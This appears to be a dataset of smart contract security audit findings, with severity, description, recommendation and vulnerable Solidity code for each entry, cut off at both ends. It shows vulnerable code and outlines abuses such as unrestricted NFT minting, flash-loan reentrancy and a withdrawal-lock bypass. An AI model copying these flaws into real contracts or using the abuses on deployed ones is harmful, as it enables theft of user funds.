balance;\\n}\\n```\\n -Pod: Having multiple token drops is inconsistentчmediumчThe `Pod` contract had the `drop` storage field and mapping of different TokenDrops `(token => TokenDrop)`. When adding a new `TokenDrop` in the mapping, the `drop` field is also changed to the added _tokenDrop:\\n```\\nfunction setTokenDrop(address \\_token, address \\_tokenDrop)\\n external\\n returns (bool)\\n{\\n require(\\n msg.sender == factory || msg.sender == owner(),\\n \"Pod:unauthorized-set-token-drop\"\\n );\\n\\n // Check if target<>tokenDrop mapping exists\\n require(\\n drops[\\_token] == TokenDrop(0),\\n \"Pod:target-tokendrop-mapping-exists\"\\n );\\n\\n // Set TokenDrop Referance\\n drop = TokenDrop(\\_tokenDrop);\\n\\n // Set target<>tokenDrop mapping\\n drops[\\_token] = drop;\\n\\n return true;\\n}\\n```\\n\\nOn the other hand, the `measure` token and the `asset` token of the `drop` are strictly defined by the Pod contract. They cannot be changed, so all `TokenDrops` are supposed to have the same `asset` and `measure` tokens. So it is useless to have different `TokenDrops`.чThe mapping seems to be unused, and only one `TokenDrop` will normally be in the system. If that code is not used, it should be deleted.чч```\\nfunction setTokenDrop(address \\_token, address \\_tokenDrop)\\n external\\n returns (bool)\\n{\\n require(\\n msg.sender == factory || msg.sender == owner(),\\n \"Pod:unauthorized-set-token-drop\"\\n );\\n\\n // Check if target<>tokenDrop mapping exists\\n require(\\n drops[\\_token] == TokenDrop(0),\\n \"Pod:target-tokendrop-mapping-exists\"\\n );\\n\\n // Set TokenDrop Referance\\n drop = TokenDrop(\\_tokenDrop);\\n\\n // Set target<>tokenDrop mapping\\n drops[\\_token] = drop;\\n\\n return true;\\n}\\n```\\n -Pod: Fees are not limited by a user during the withdrawalчmediumчWhen withdrawing from the Pod, the shares are burned, and the deposit is removed from the Pod. If there are not enough deposit tokens in the contract, the remaining tokens are withdrawn from the pool contract:\\n```\\nif (amount > currentBalance) {\\n // Calculate Withdrawl Amount\\n uint256 \\_withdraw = amount.sub(currentBalance);\\n\\n // Withdraw from Prize Pool\\n uint256 exitFee = \\_withdrawFromPool(\\_withdraw);\\n\\n // Add Exit Fee to Withdrawl Amount\\n amount = amount.sub(exitFee);\\n}\\n```\\n\\nThese tokens are withdrawn with a fee from the pool, which is not controlled or limited by the user.чAllow users to pass a `maxFee` parameter to control fees.чч```\\nif (amount > currentBalance) {\\n // Calculate Withdrawl Amount\\n uint256 \\_withdraw = amount.sub(currentBalance);\\n\\n // Withdraw from Prize Pool\\n uint256 exitFee = \\_withdrawFromPool(\\_withdraw);\\n\\n // Add Exit Fee to Withdrawl Amount\\n amount = amount.sub(exitFee);\\n}\\n```\\n -Pod.setManager() checks validity of wrong addressчlowчThe function `Pod.setManager()` allows the `owner` of the Pod contract to change the Pod's `manager`. It checks that the value of the existing `manager` in storage is nonzero. This is presumably intended to ensure that the `owner` has provided a valid `newManager` parameter in calldata.\\nThe current check will always pass once the contract is initialized with a nonzero `manager`. But, the contract can currently be initialized with a `manager` of `IPodManager(address(0))`. In this case, the check would prevent the `manager` from ever being updated.\\n```\\nfunction setManager(IPodManager newManager)\\n public\\n virtual\\n onlyOwner\\n returns (bool)\\n{\\n // Require Valid Address\\n require(address(manager) != address(0), \"Pod:invalid-manager-address\");\\n```\\nчChange the check to:\\n```\\nrequire(address(newManager) != address(0), \"Pod:invalid-manager-address\");\\n```\\n\\nMore generally, attempt to define validity criteria for all input values that are as strict as possible. Consider preventing zero inputs or inputs that might conflict with other addresses in the smart contract system altogether, including in contract initialization functions.чч```\\nfunction setManager(IPodManager newManager)\\n public\\n virtual\\n onlyOwner\\n returns (bool)\\n{\\n // Require Valid Address\\n require(address(manager) != address(0), \"Pod:invalid-manager-address\");\\n```\\n -Reuse of CHAINID from contract deploymentчlowчThe internal function `_validateWithdrawSignature()` is used to check whether a sponsored token withdrawal is approved by the owner of the stealth address that received the tokens. Among other data, the chain ID is signed over to prevent replay of signatures on other EVM-compatible chains.\\n```\\nfunction \\_validateWithdrawSignature(\\n address \\_stealthAddr,\\n address \\_acceptor,\\n address \\_tokenAddr,\\n address \\_sponsor,\\n uint256 \\_sponsorFee,\\n IUmbraHookReceiver \\_hook,\\n bytes memory \\_data,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) internal view {\\n bytes32 \\_digest =\\n keccak256(\\n abi.encodePacked(\\n \"\\x19Ethereum Signed Message:\\n32\",\\n keccak256(abi.encode(chainId, version, \\_acceptor, \\_tokenAddr, \\_sponsor, \\_sponsorFee, address(\\_hook), \\_data))\\n )\\n );\\n\\n address \\_recoveredAddress = ecrecover(\\_digest, \\_v, \\_r, \\_s);\\n require(\\_recoveredAddress != address(0) && \\_recoveredAddress == \\_stealthAddr, \"Umbra: Invalid Signature\");\\n}\\n```\\n\\nHowever, this chain ID is set as an immutable value in the contract constructor. In the case of a future contentious hard fork of the Ethereum network, the same `Umbra` contract would exist on both of the resulting chains. One of these two chains would be expected to change the network's chain ID, but the `Umbra` contracts would not be aware of this change. As a result, signatures to the `Umbra` contract on either chain would be replayable on the other chain.\\nThis is a common pattern in contracts that implement EIP-712 signatures. Presumably, the motivation in most cases for committing to the chain ID at deployment time is to avoid recomputing the EIP-712 domain separator for every signature verification. In this case, the chain ID is a direct input to the generation of the signed digest, so this should not be a concern.чReplace the use of the `chainId` immutable value with the `CHAINID` opcode in `_validateWithdrawSignature()`. Note that `CHAINID` is only available using Solidity's inline assembly, so this would need to be accessed in the same way as it is currently accessed in the contract's constructor:\\n```\\nuint256 \\_chainId;\\n\\nassembly {\\n \\_chainId := chainid()\\n}\\n```\\nчч```\\nfunction \\_validateWithdrawSignature(\\n address \\_stealthAddr,\\n address \\_acceptor,\\n address \\_tokenAddr,\\n address \\_sponsor,\\n uint256 \\_sponsorFee,\\n IUmbraHookReceiver \\_hook,\\n bytes memory \\_data,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) internal view {\\n bytes32 \\_digest =\\n keccak256(\\n abi.encodePacked(\\n \"\\x19Ethereum Signed Message:\\n32\",\\n keccak256(abi.encode(chainId, version, \\_acceptor, \\_tokenAddr, \\_sponsor, \\_sponsorFee, address(\\_hook), \\_data))\\n )\\n );\\n\\n address \\_recoveredAddress = ecrecover(\\_digest, \\_v, \\_r, \\_s);\\n require(\\_recoveredAddress != address(0) && \\_recoveredAddress == \\_stealthAddr, \"Umbra: Invalid Signature\");\\n}\\n```\\n -Random task executionчhighчIn a scenario where user takes a flash loan, `_parseFLAndExecute()` gives the flash loan wrapper contract (FLAaveV2, FLDyDx) the permission to execute functions on behalf of the user's `DSProxy`. This execution permission is revoked only after the entire recipe execution is finished, which means that in case that any of the external calls along the recipe execution is malicious, it might call `executeAction()` back and inject any task it wishes (e.g. take user's funds out, drain approved tokens, etc)\\n```\\nfunction executeOperation(\\n address[] memory \\_assets,\\n uint256[] memory \\_amounts,\\n uint256[] memory \\_fees,\\n address \\_initiator,\\n bytes memory \\_params\\n) public returns (bool) {\\n require(msg.sender == AAVE\\_LENDING\\_POOL, ERR\\_ONLY\\_AAVE\\_CALLER);\\n require(\\_initiator == address(this), ERR\\_SAME\\_CALLER);\\n\\n (Task memory currTask, address proxy) = abi.decode(\\_params, (Task, address));\\n\\n // Send FL amounts to user proxy\\n for (uint256 i = 0; i < \\_assets.length; ++i) {\\n \\_assets[i].withdrawTokens(proxy, \\_amounts[i]);\\n }\\n\\n address payable taskExecutor = payable(registry.getAddr(TASK\\_EXECUTOR\\_ID));\\n\\n // call Action execution\\n IDSProxy(proxy).execute{value: address(this).balance}(\\n taskExecutor,\\n abi.encodeWithSelector(CALLBACK\\_SELECTOR, currTask, bytes32(\\_amounts[0] + \\_fees[0]))\\n );\\n\\n // return FL\\n for (uint256 i = 0; i < \\_assets.length; i++) {\\n \\_assets[i].approveToken(address(AAVE\\_LENDING\\_POOL), \\_amounts[i] + \\_fees[i]);\\n }\\n\\n return true;\\n}\\n```\\nчA reentrancy guard (mutex) that covers the entire content of FLAaveV2.executeOperation/FLDyDx.callFunction should be used to prevent such attack.чч```\\nfunction executeOperation(\\n address[] memory \\_assets,\\n uint256[] memory \\_amounts,\\n uint256[] memory \\_fees,\\n address \\_initiator,\\n bytes memory \\_params\\n) public returns (bool) {\\n require(msg.sender == AAVE\\_LENDING\\_POOL, ERR\\_ONLY\\_AAVE\\_CALLER);\\n require(\\_initiator == address(this), ERR\\_SAME\\_CALLER);\\n\\n (Task memory currTask, address proxy) = abi.decode(\\_params, (Task, address));\\n\\n // Send FL amounts to user proxy\\n for (uint256 i = 0; i < \\_assets.length; ++i) {\\n \\_assets[i].withdrawTokens(proxy, \\_amounts[i]);\\n }\\n\\n address payable taskExecutor = payable(registry.getAddr(TASK\\_EXECUTOR\\_ID));\\n\\n // call Action execution\\n IDSProxy(proxy).execute{value: address(this).balance}(\\n taskExecutor,\\n abi.encodeWithSelector(CALLBACK\\_SELECTOR, currTask, bytes32(\\_amounts[0] + \\_fees[0]))\\n );\\n\\n // return FL\\n for (uint256 i = 0; i < \\_assets.length; i++) {\\n \\_assets[i].approveToken(address(AAVE\\_LENDING\\_POOL), \\_amounts[i] + \\_fees[i]);\\n }\\n\\n return true;\\n}\\n```\\n -Tokens with more than 18 decimal points will cause issuesчhighчIt is assumed that the maximum number of decimals for each token is 18. However uncommon, but it is possible to have tokens with more than 18 decimals, as an Example YAMv2 has 24 decimals. This can result in broken code flow and unpredictable outcomes (e.g. an underflow will result with really high rates).\\n```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n```\\nчMake sure the code won't fail in case the token's decimals is more than 18.чч```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n```\\n -Error codes of Compound's Comptroller.enterMarket, Comptroller.exitMarket are not checkedчhighчCompound's `enterMarket/exitMarket` functions return an error code instead of reverting in case of failure. DeFi Saver smart contracts never check for the error codes returned from Compound smart contracts, although the code flow might revert due to unavailability of the CTokens, however early on checks for Compound errors are suggested.\\n```\\nfunction enterMarket(address \\_cTokenAddr) public {\\n address[] memory markets = new address[](1);\\n markets[0] = \\_cTokenAddr;\\n\\n IComptroller(COMPTROLLER\\_ADDR).enterMarkets(markets);\\n}\\n\\n/// @notice Exits the Compound market\\n/// @param \\_cTokenAddr CToken address of the token\\nfunction exitMarket(address \\_cTokenAddr) public {\\n IComptroller(COMPTROLLER\\_ADDR).exitMarket(\\_cTokenAddr);\\n}\\n```\\nчCaller contract should revert in case the error code is not 0.чч```\\nfunction enterMarket(address \\_cTokenAddr) public {\\n address[] memory markets = new address[](1);\\n markets[0] = \\_cTokenAddr;\\n\\n IComptroller(COMPTROLLER\\_ADDR).enterMarkets(markets);\\n}\\n\\n/// @notice Exits the Compound market\\n/// @param \\_cTokenAddr CToken address of the token\\nfunction exitMarket(address \\_cTokenAddr) public {\\n IComptroller(COMPTROLLER\\_ADDR).exitMarket(\\_cTokenAddr);\\n}\\n```\\n -Reversed order of parameters in allowance function callчmediumчWhen trying to pull the maximum amount of tokens from an approver to the allowed spender, the parameters that are used for the `allowance` function call are not in the same order that is used later in the call to `safeTransferFrom`.\\n```\\nfunction pullTokens(\\n address \\_token,\\n address \\_from,\\n uint256 \\_amount\\n) internal returns (uint256) {\\n // handle max uint amount\\n if (\\_amount == type(uint256).max) {\\n uint256 allowance = IERC20(\\_token).allowance(address(this), \\_from);\\n uint256 balance = getBalance(\\_token, \\_from);\\n\\n \\_amount = (balance > allowance) ? allowance : balance;\\n }\\n\\n if (\\_from != address(0) && \\_from != address(this) && \\_token != ETH\\_ADDR && \\_amount != 0) {\\n IERC20(\\_token).safeTransferFrom(\\_from, address(this), \\_amount);\\n }\\n\\n return \\_amount;\\n}\\n```\\nчReverse the order of parameters in `allowance` function call to fit the order that is in the `safeTransferFrom` function call.чч```\\nfunction pullTokens(\\n address \\_token,\\n address \\_from,\\n uint256 \\_amount\\n) internal returns (uint256) {\\n // handle max uint amount\\n if (\\_amount == type(uint256).max) {\\n uint256 allowance = IERC20(\\_token).allowance(address(this), \\_from);\\n uint256 balance = getBalance(\\_token, \\_from);\\n\\n \\_amount = (balance > allowance) ? allowance : balance;\\n }\\n\\n if (\\_from != address(0) && \\_from != address(this) && \\_token != ETH\\_ADDR && \\_amount != 0) {\\n IERC20(\\_token).safeTransferFrom(\\_from, address(this), \\_amount);\\n }\\n\\n return \\_amount;\\n}\\n```\\n -Kyber getRates code is unclearчlowч`getSellRate` can be converted into one function to get the rates, which then for buy or sell can swap input and output tokens\\n`getBuyRate` uses a 3% slippage that is not documented.\\n```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n\\n /// @notice Return a rate for which we can buy an amount of tokens\\n /// @param \\_srcAddr From token\\n /// @param \\_destAddr To token\\n /// @param \\_destAmount To amount\\n /// @return rate Rate\\n function getBuyRate(address \\_srcAddr, address \\_destAddr, uint \\_destAmount, bytes memory \\_additionalData) public override view returns (uint rate) {\\n uint256 srcRate = getSellRate(\\_destAddr, \\_srcAddr, \\_destAmount, \\_additionalData);\\n uint256 srcAmount = wmul(srcRate, \\_destAmount);\\n\\n rate = getSellRate(\\_srcAddr, \\_destAddr, srcAmount, \\_additionalData);\\n\\n // increase rate by 3% too account for inaccuracy between sell/buy conversion\\n rate = rate + (rate / 30);\\n }\\n```\\nчRefactoring the code to separate getting rate functionality with `getSellRate` and `getBuyRate`. Explicitly document any assumptions in the code ( slippage, etc)чч```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n\\n /// @notice Return a rate for which we can buy an amount of tokens\\n /// @param \\_srcAddr From token\\n /// @param \\_destAddr To token\\n /// @param \\_destAmount To amount\\n /// @return rate Rate\\n function getBuyRate(address \\_srcAddr, address \\_destAddr, uint \\_destAmount, bytes memory \\_additionalData) public override view returns (uint rate) {\\n uint256 srcRate = getSellRate(\\_destAddr, \\_srcAddr, \\_destAmount, \\_additionalData);\\n uint256 srcAmount = wmul(srcRate, \\_destAmount);\\n\\n rate = getSellRate(\\_srcAddr, \\_destAddr, srcAmount, \\_additionalData);\\n\\n // increase rate by 3% too account for inaccuracy between sell/buy conversion\\n rate = rate + (rate / 30);\\n }\\n```\\n -Return values not used for DFSExchangeCore.onChainSwapчlowчReturn values from `DFSExchangeCore.onChainSwap` are not used.\\n```\\nfunction \\_sell(ExchangeData memory exData) internal returns (address, uint256) {\\n uint256 amountWithoutFee = exData.srcAmount;\\n address wrapper = exData.offchainData.wrapper;\\n bool offChainSwapSuccess;\\n\\n uint256 destBalanceBefore = exData.destAddr.getBalance(address(this));\\n\\n // Takes DFS exchange fee\\n exData.srcAmount -= getFee(\\n exData.srcAmount,\\n exData.user,\\n exData.srcAddr,\\n exData.dfsFeeDivider\\n );\\n\\n // Try 0x first and then fallback on specific wrapper\\n if (exData.offchainData.price > 0) {\\n (offChainSwapSuccess, ) = offChainSwap(exData, ExchangeActionType.SELL);\\n }\\n\\n // fallback to desired wrapper if 0x failed\\n if (!offChainSwapSuccess) {\\n onChainSwap(exData, ExchangeActionType.SELL);\\n wrapper = exData.wrapper;\\n }\\n\\n uint256 destBalanceAfter = exData.destAddr.getBalance(address(this));\\n uint256 amountBought = sub(destBalanceAfter, destBalanceBefore);\\n\\n // check slippage\\n require(amountBought >= wmul(exData.minPrice, exData.srcAmount), ERR\\_SLIPPAGE\\_HIT);\\n\\n // revert back exData changes to keep it consistent\\n exData.srcAmount = amountWithoutFee;\\n\\n return (wrapper, amountBought);\\n}\\n```\\n\\n```\\nfunction \\_buy(ExchangeData memory exData) internal returns (address, uint256) {\\n require(exData.destAmount != 0, ERR\\_DEST\\_AMOUNT\\_MISSING);\\n\\n uint256 amountWithoutFee = exData.srcAmount;\\n address wrapper = exData.offchainData.wrapper;\\n bool offChainSwapSuccess;\\n\\n uint256 destBalanceBefore = exData.destAddr.getBalance(address(this));\\n\\n // Takes DFS exchange fee\\n exData.srcAmount -= getFee(\\n exData.srcAmount,\\n exData.user,\\n exData.srcAddr,\\n exData.dfsFeeDivider\\n );\\n\\n // Try 0x first and then fallback on specific wrapper\\n if (exData.offchainData.price > 0) {\\n (offChainSwapSuccess, ) = offChainSwap(exData, ExchangeActionType.BUY);\\n }\\n\\n // fallback to desired wrapper if 0x failed\\n if (!offChainSwapSuccess) {\\n onChainSwap(exData, ExchangeActionType.BUY);\\n wrapper = exData.wrapper;\\n }\\n\\n uint256 destBalanceAfter = exData.destAddr.getBalance(address(this));\\n uint256 amountBought = sub(destBalanceAfter, destBalanceBefore);\\n\\n // check slippage\\n require(amountBought >= exData.destAmount, ERR\\_SLIPPAGE\\_HIT);\\n\\n // revert back exData changes to keep it consistent\\n exData.srcAmount = amountWithoutFee;\\n\\n return (wrapper, amountBought);\\n}\\n```\\nчThe return value can be used for verification of the swap or used in the event data.чч```\\nfunction \\_sell(ExchangeData memory exData) internal returns (address, uint256) {\\n uint256 amountWithoutFee = exData.srcAmount;\\n address wrapper = exData.offchainData.wrapper;\\n bool offChainSwapSuccess;\\n\\n uint256 destBalanceBefore = exData.destAddr.getBalance(address(this));\\n\\n // Takes DFS exchange fee\\n exData.srcAmount -= getFee(\\n exData.srcAmount,\\n exData.user,\\n exData.srcAddr,\\n exData.dfsFeeDivider\\n );\\n\\n // Try 0x first and then fallback on specific wrapper\\n if (exData.offchainData.price > 0) {\\n (offChainSwapSuccess, ) = offChainSwap(exData, ExchangeActionType.SELL);\\n }\\n\\n // fallback to desired wrapper if 0x failed\\n if (!offChainSwapSuccess) {\\n onChainSwap(exData, ExchangeActionType.SELL);\\n wrapper = exData.wrapper;\\n }\\n\\n uint256 destBalanceAfter = exData.destAddr.getBalance(address(this));\\n uint256 amountBought = sub(destBalanceAfter, destBalanceBefore);\\n\\n // check slippage\\n require(amountBought >= wmul(exData.minPrice, exData.srcAmount), ERR\\_SLIPPAGE\\_HIT);\\n\\n // revert back exData changes to keep it consistent\\n exData.srcAmount = amountWithoutFee;\\n\\n return (wrapper, amountBought);\\n}\\n```\\n -Return value is not used for TokenUtils.withdrawTokensчlowчThe return value of `TokenUtils.withdrawTokens` which represents the actual amount of tokens that were transferred is never used throughout the repository. This might cause discrepancy in the case where the original value of `_amount` was `type(uint256).max`.\\n```\\nfunction \\_borrow(\\n address \\_market,\\n address \\_tokenAddr,\\n uint256 \\_amount,\\n uint256 \\_rateMode,\\n address \\_to,\\n address \\_onBehalf\\n) internal returns (uint256) {\\n ILendingPoolV2 lendingPool = getLendingPool(\\_market);\\n\\n // defaults to onBehalf of proxy\\n if (\\_onBehalf == address(0)) {\\n \\_onBehalf = address(this);\\n }\\n\\n lendingPool.borrow(\\_tokenAddr, \\_amount, \\_rateMode, AAVE\\_REFERRAL\\_CODE, \\_onBehalf);\\n\\n \\_tokenAddr.withdrawTokens(\\_to, \\_amount);\\n\\n logger.Log(\\n address(this),\\n msg.sender,\\n \"AaveBorrow\",\\n abi.encode(\\_market, \\_tokenAddr, \\_amount, \\_rateMode, \\_to, \\_onBehalf)\\n );\\n\\n return \\_amount;\\n}\\n```\\n\\n```\\nfunction withdrawTokens(\\n address \\_token,\\n address \\_to,\\n uint256 \\_amount\\n) internal returns (uint256) {\\n if (\\_amount == type(uint256).max) {\\n \\_amount = getBalance(\\_token, address(this));\\n }\\n```\\nчThe return value can be used to validate the withdrawal or used in the event emitted.чч```\\nfunction \\_borrow(\\n address \\_market,\\n address \\_tokenAddr,\\n uint256 \\_amount,\\n uint256 \\_rateMode,\\n address \\_to,\\n address \\_onBehalf\\n) internal returns (uint256) {\\n ILendingPoolV2 lendingPool = getLendingPool(\\_market);\\n\\n // defaults to onBehalf of proxy\\n if (\\_onBehalf == address(0)) {\\n \\_onBehalf = address(this);\\n }\\n\\n lendingPool.borrow(\\_tokenAddr, \\_amount, \\_rateMode, AAVE\\_REFERRAL\\_CODE, \\_onBehalf);\\n\\n \\_tokenAddr.withdrawTokens(\\_to, \\_amount);\\n\\n logger.Log(\\n address(this),\\n msg.sender,\\n \"AaveBorrow\",\\n abi.encode(\\_market, \\_tokenAddr, \\_amount, \\_rateMode, \\_to, \\_onBehalf)\\n );\\n\\n return \\_amount;\\n}\\n```\\n -Anyone is able to mint NFTs by calling mintNFTsForLMчhighчThe contract `LiquidityMiningNFT` has the method `mintNFTsForLM`.\\n```\\nfunction mintNFTsForLM(address \\_liquidiyMiningAddr) external {\\n uint256[] memory \\_ids = new uint256[](NFT\\_TYPES\\_COUNT);\\n uint256[] memory \\_amounts = new uint256[](NFT\\_TYPES\\_COUNT);\\n\\n \\_ids[0] = 1;\\n \\_amounts[0] = 5;\\n\\n \\_ids[1] = 2;\\n \\_amounts[1] = 1 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[2] = 3;\\n \\_amounts[2] = 3 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[3] = 4;\\n \\_amounts[3] = 6 \\* LEADERBOARD\\_SIZE;\\n\\n \\_mintBatch(\\_liquidiyMiningAddr, \\_ids, \\_amounts, \"\");\\n}\\n```\\n\\nHowever, this contract does not have any kind of special permissions to limit who is able to mint tokens.\\nAn attacker could call `LiquidityMiningNFT.mintNFTsForLM(0xhackerAddress)` to mint tokens for their address and sell them on the marketplace. They are also allowed to mint as many tokens as they want by calling the method multiple times.чAdd some permissions to limit only some actors to mint tokens.чч```\\nfunction mintNFTsForLM(address \\_liquidiyMiningAddr) external {\\n uint256[] memory \\_ids = new uint256[](NFT\\_TYPES\\_COUNT);\\n uint256[] memory \\_amounts = new uint256[](NFT\\_TYPES\\_COUNT);\\n\\n \\_ids[0] = 1;\\n \\_amounts[0] = 5;\\n\\n \\_ids[1] = 2;\\n \\_amounts[1] = 1 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[2] = 3;\\n \\_amounts[2] = 3 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[3] = 4;\\n \\_amounts[3] = 6 \\* LEADERBOARD\\_SIZE;\\n\\n \\_mintBatch(\\_liquidiyMiningAddr, \\_ids, \\_amounts, \"\");\\n}\\n```\\n -A liquidity provider can withdraw all his funds anytimeчhighчSince some users provide liquidity to sell the insurance policies, it is important that these providers cannot withdraw their funds when the security breach happens and the policyholders are submitting claims. The liquidity providers can only request their funds first and withdraw them later (in a week).\\n```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n WithdrawalStatus \\_status = getWithdrawalStatus(msg.sender);\\n\\n require(\\_status == WithdrawalStatus.NONE || \\_status == WithdrawalStatus.EXPIRED,\\n \"PB: Can't request withdrawal\");\\n\\n uint256 \\_daiTokensToWithdraw = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n uint256 \\_availableDaiBalance = balanceOf(msg.sender).mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (block.timestamp < liquidityMining.getEndLMTime().add(neededTimeAfterLM)) {\\n \\_availableDaiBalance = \\_availableDaiBalance.sub(liquidityFromLM[msg.sender]);\\n }\\n\\n require(totalLiquidity >= totalCoverTokens.add(\\_daiTokensToWithdraw),\\n \"PB: Not enough liquidity\");\\n\\n require(\\_availableDaiBalance >= \\_daiTokensToWithdraw, \"PB: Wrong announced amount\");\\n\\n WithdrawalInfo memory \\_newWithdrawalInfo;\\n \\_newWithdrawalInfo.amount = \\_tokensToWithdraw;\\n \\_newWithdrawalInfo.readyToWithdrawDate = block.timestamp.add(withdrawalPeriod);\\n\\n withdrawalsInfo[msg.sender] = \\_newWithdrawalInfo;\\n emit RequestWithdraw(msg.sender, \\_tokensToWithdraw, \\_newWithdrawalInfo.readyToWithdrawDate);\\n}\\n```\\n\\n```\\nfunction withdrawLiquidity() external override {\\n require(getWithdrawalStatus(msg.sender) == WithdrawalStatus.READY,\\n \"PB: Withdrawal is not ready\");\\n\\n uint256 \\_tokensToWithdraw = withdrawalsInfo[msg.sender].amount;\\n uint256 \\_daiTokensToWithdraw = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (withdrawalQueue.length != 0 || totalLiquidity.sub(\\_daiTokensToWithdraw) < totalCoverTokens) {\\n withdrawalQueue.push(msg.sender);\\n } else {\\n \\_withdrawLiquidity(msg.sender, \\_tokensToWithdraw);\\n }\\n}\\n```\\n\\nThere is a restriction in `requestWithdrawal` that requires the liquidity provider to have enough funds at the moment of request:\\n```\\nrequire(totalLiquidity >= totalCoverTokens.add(\\_daiTokensToWithdraw),\\n \"PB: Not enough liquidity\");\\n\\nrequire(\\_availableDaiBalance >= \\_daiTokensToWithdraw, \"PB: Wrong announced amount\");\\n```\\n\\nBut after the request is created, these funds can then be transferred to another address. When the request is created, the provider should wait for 7 days, and then there will be 2 days to withdraw the requested amount:\\n```\\nwithdrawalPeriod = 1 weeks;\\nwithdrawalExpirePeriod = 2 days;\\n```\\n\\nThe attacker would have 4 addresses that will send the pool tokens to each other and request withdrawal of the full amount one by one every 2 days. So at least one of the addresses can withdraw all of the funds at any point in time. If the liquidity provider needs to withdraw funds immediately, he should transfer all funds to that address and execute the withdrawal.чResolution\\nThe funds are now locked when the withdrawal is requested, so funds cannot be transferred after the request, and this bug cannot be exploited anymore.\\nOne of the solutions would be to block the DAIx tokens from being transferred after the withdrawal request.чч```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n WithdrawalStatus \\_status = getWithdrawalStatus(msg.sender);\\n\\n require(\\_status == WithdrawalStatus.NONE || \\_status == WithdrawalStatus.EXPIRED,\\n \"PB: Can't request withdrawal\");\\n\\n uint256 \\_daiTokensToWithdraw = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n uint256 \\_availableDaiBalance = balanceOf(msg.sender).mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (block.timestamp < liquidityMining.getEndLMTime().add(neededTimeAfterLM)) {\\n \\_availableDaiBalance = \\_availableDaiBalance.sub(liquidityFromLM[msg.sender]);\\n }\\n\\n require(totalLiquidity >= totalCoverTokens.add(\\_daiTokensToWithdraw),\\n \"PB: Not enough liquidity\");\\n\\n require(\\_availableDaiBalance >= \\_daiTokensToWithdraw, \"PB: Wrong announced amount\");\\n\\n WithdrawalInfo memory \\_newWithdrawalInfo;\\n \\_newWithdrawalInfo.amount = \\_tokensToWithdraw;\\n \\_newWithdrawalInfo.readyToWithdrawDate = block.timestamp.add(withdrawalPeriod);\\n\\n withdrawalsInfo[msg.sender] = \\_newWithdrawalInfo;\\n emit RequestWithdraw(msg.sender, \\_tokensToWithdraw, \\_newWithdrawalInfo.readyToWithdrawDate);\\n}\\n```\\n -The buyPolicyFor/addLiquidityFor should transfer funds from msg.senderчhighчWhen calling the buyPolicyFor/addLiquidityFor functions, are called with the parameter _policyHolderAddr/_liquidityHolderAddr who is going to be the beneficiary in buying policy/adding liquidity:\\n```\\nfunction buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens \\n) external override {\\n \\_buyPolicyFor(\\_policyHolderAddr, \\_epochsNumber, \\_coverTokens);\\n}\\n```\\n\\n```\\nfunction addLiquidityFor(address \\_liquidityHolderAddr, uint256 \\_liquidityAmount) external override {\\n \\_addLiquidityFor(\\_liquidityHolderAddr, \\_liquidityAmount, false);\\n}\\n```\\n\\nDuring the execution, the funds for the policy/liquidity are transferred from the _policyHolderAddr/_liquidityHolderAddr, while it's usually expected that they should be transferred from `msg.sender`. Because of that, anyone can call a function on behalf of a user that gave the allowance to the `PolicyBook`.\\nFor example, a user(victim) wants to add some DAI to the liquidity pool and gives allowance to the `PolicyBook`. After that, the user should call `addLiquidity`, but the attacker can front-run this transaction and buy a policy on behalf of the victim instead.\\nAlso, there is a curious edge case that makes this issue Critical: _policyHolderAddr/_liquidityHolderAddr parameters can be equal to the address of the `PolicyBook` contract. That may lead to multiple different dangerous attack vectors.чMake sure that nobody can transfer funds on behalf of the users if it's not intended.чч```\\nfunction buyPolicyFor(\\n address 